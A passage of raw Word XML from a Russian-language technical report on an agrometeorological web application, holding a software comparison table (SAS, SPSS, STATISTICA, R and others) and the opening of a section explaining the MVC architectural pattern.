                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Эргоно</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="636BEFF4" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="0066369B" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>мичность</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1655" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3EE14679" w14:textId="77777777" w:rsidR="008778F0" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Веб-</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="635959D6" w14:textId="77777777" w:rsidR="008778F0" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>интерфейс</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="75D84453" w14:textId="77777777" w:rsidR="008778F0" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Интеграция</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04C21F57" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="004A2370" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>с</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> IOT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008778F0" w:rsidRPr="0066369B" w14:paraId="0D106CDA" w14:textId="77777777" w:rsidTr="0038557A">
        <w:trPr>
          <w:trHeight w:val="410"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1590" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="719190A5" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="0066369B" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Агромон</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="78670BCA" w14:textId="00284144" w:rsidR="008778F0" w:rsidRPr="000C7560" w:rsidRDefault="003A41B1" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="243C3C58"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35E3CE77"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7F74848B"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340DB61E"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5EA25DD2" w14:textId="77777777" w:rsidTr="0038557A">
        <w:trPr>
          <w:trHeight w:val="410"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1590" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4A2C9367" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="008809B0" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2B1FB6B4" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="00EB37C5" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB37C5">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7AB0DA86"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6DBC3D4A"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69882E66" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="00EB37C5" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>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2868FC43"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5CE11504" w14:textId="77777777" w:rsidTr="0038557A">
        <w:trPr>
          <w:trHeight w:val="836"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1590" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="15F62612" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="008809B0" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Schicksal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1F1F3FC8" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="00EB37C5" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB37C5">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0CDE9AD3"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52E648D9"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67858F83"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09DF76E6"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1FFB76C3" w14:textId="77777777" w:rsidTr="0038557A">
        <w:trPr>
          <w:trHeight w:val="836"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1590" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="41F034E3" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="008809B0" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SPSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3729BAA9" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="00EB37C5" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB37C5">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56EAC933"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08358146"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07AD0272"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134382BE"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5489F252" w14:textId="77777777" w:rsidTr="0038557A">
        <w:trPr>
          <w:trHeight w:val="836"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1590" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0D07D21D" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="008809B0" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>STATISTICA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="001449A7" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="00EB37C5" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB37C5">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255A381A"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11270C46"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220E9DD7"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25CA14BA"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7EE56566" w14:textId="77777777" w:rsidTr="0038557A">
        <w:trPr>
          <w:trHeight w:val="836"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1590" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4B2209F5" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="008809B0" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1529" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="73E4D17F" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="00EB37C5" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB37C5">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1567" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2C45D8A5"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0E94EDD0"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0273FD10"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36C000A4" w14:textId="77777777" w:rsidR="008778F0" w:rsidRPr="00EB37C5" w:rsidRDefault="008778F0" w:rsidP="0038557A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB37C5">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B3C1FD8" w14:textId="77777777" w:rsidR="008F392E" w:rsidRDefault="008F392E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5367561F" w14:textId="18C75B5E" w:rsidR="0093378B" w:rsidRPr="00B45074" w:rsidRDefault="0093378B" w:rsidP="00584880">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc122277550"/>
      <w:bookmarkStart w:id="31" w:name="_Toc161568211"/>
      <w:bookmarkStart w:id="32" w:name="_Toc162709237"/>
      <w:r w:rsidRPr="00541C36">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidRPr="00541C36">
        <w:t>Выбор технологий для решения задачи</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="7A6D7A09" w14:textId="5CC3EFFF" w:rsidR="0093378B" w:rsidRPr="004D37C5" w:rsidRDefault="0093378B" w:rsidP="00AC25AD">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc161568212"/>
      <w:bookmarkStart w:id="34" w:name="_Toc162709238"/>
      <w:r w:rsidRPr="00642642">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00642642">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Технология программирования веб</w:t>
      </w:r>
      <w:r w:rsidR="00D51198">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00642642">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>сервера и графического пользовательского интерфейса</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="54EFA926" w14:textId="63AA45E3" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:r>
        <w:t>В задачу разработки входила необходимость предоставления пользователю доступа к просмотру и использованию указанных выше данных метеостанции. Для этого необходимо создать клиент-серверную архитектуру, где на стороне сервера будут обрабатываться и храниться данные, а на стороне клиента данные будут представляться. Подобную проблему решает архитектурный паттерн MVC [</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC25AD" w:rsidRPr="00AC25AD">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>]. Термин «модель-представление-контроллер» (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>model-view-controller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – MVC) был в употреблении с конца 1970-х годов и происходит из проекта </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Smalltalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> в Xerox PARC [</w:t>
      </w:r>
      <w:r w:rsidR="00AC25AD" w:rsidRPr="00AC25AD">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>], где он был задуман</w:t>
      </w:r>
      <w:r w:rsidR="00D51198">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как способ организации ряда ранних приложений с графическим пользовательским интерфейсом, и нюансы первоначального паттерна MVC применимы к приложениям – и особенно хорошо к веб-приложениям. Отметим, что в целом MVC хорошо проявила себя при создании веб-приложений для сельского хозяйства [</w:t>
      </w:r>
      <w:r w:rsidR="00AC25AD" w:rsidRPr="00AC25AD">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">]. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0938F6A4" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:r>
        <w:t>Если оперировать высокоуровневыми понятиями, то паттерн MVC означает, что приложение MVC будет разделено, по крайней мере, на три части:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695AB144" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>Модели, содержащие или представляющие данные, с которыми работают пользователи;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574F66AD" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>Представления, используемые для визуализации некоторой части модели в виде пользовательского интерфейса;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C22E70C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>Контроллеры, которые обрабатывают входящие запросы, выполняют операции с моделью и выбирают представления для визуализации пользователю.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020675EE" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:r>
        <w:t xml:space="preserve">Каждая порция архитектуры MVC четко определена и самодостаточна: такое положение вещей называют разделением обязанностей. Логика, которая </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>манипулирует данными в модели, содержится только в модели. Логика, отображающая данные, присутствует только в представлении. Код, который обрабатывает пользовательские запросы и ввод, находится только в контроллере. Благодаря ясному разделению между частями приложение будет легче сопровождать и расширять на протяжении времени его существования вне зависимости от того, насколько большим оно станет. Модели (M в MVC) содержат данные, с которыми работают пользователи. Существуют два обширных типа моделей: модели представлений, которые выражают сами данные, передаваемые из контроллера в представление, и модели предметной области, которые содержат данные в предметной области наряду с операциями, трансформациями и правилами для создания, хранения и манипулирования данными, вместе называемыми логикой модели. Предметная область в текущем проекте – это агрометеорологические данные.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE6D246" w14:textId="37A09F36" w:rsidR="0093378B" w:rsidRDefault="001F2D74" w:rsidP="005924E5">
      <w:r>
        <w:t>Принцип работы архитектурного паттерна</w:t>
      </w:r>
      <w:r w:rsidRPr="001F2D74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Модель – Представление - Контроллер (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="001F2D74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">представлен на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="0093378B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1DA4B8" w14:textId="7C61A534" w:rsidR="0093378B" w:rsidRDefault="001F2D74" w:rsidP="005924E5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E941C44" wp14:editId="79812BA4">
            <wp:extent cx="4376203" cy="2943225"/>
            <wp:effectExtent l="0" t="0" r="5715"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79906" cy="2945716"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6244F6CA" w14:textId="0B337ACE" w:rsidR="0093378B" w:rsidRPr="001F2D74" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="001F2D74">
        <w:t xml:space="preserve">Принцип работы архитектурного паттерна </w:t>
      </w:r>
      <w:r w:rsidR="001F2D74">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABC9C52" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="005924E5">
      <w:r w:rsidRPr="00505DD4">
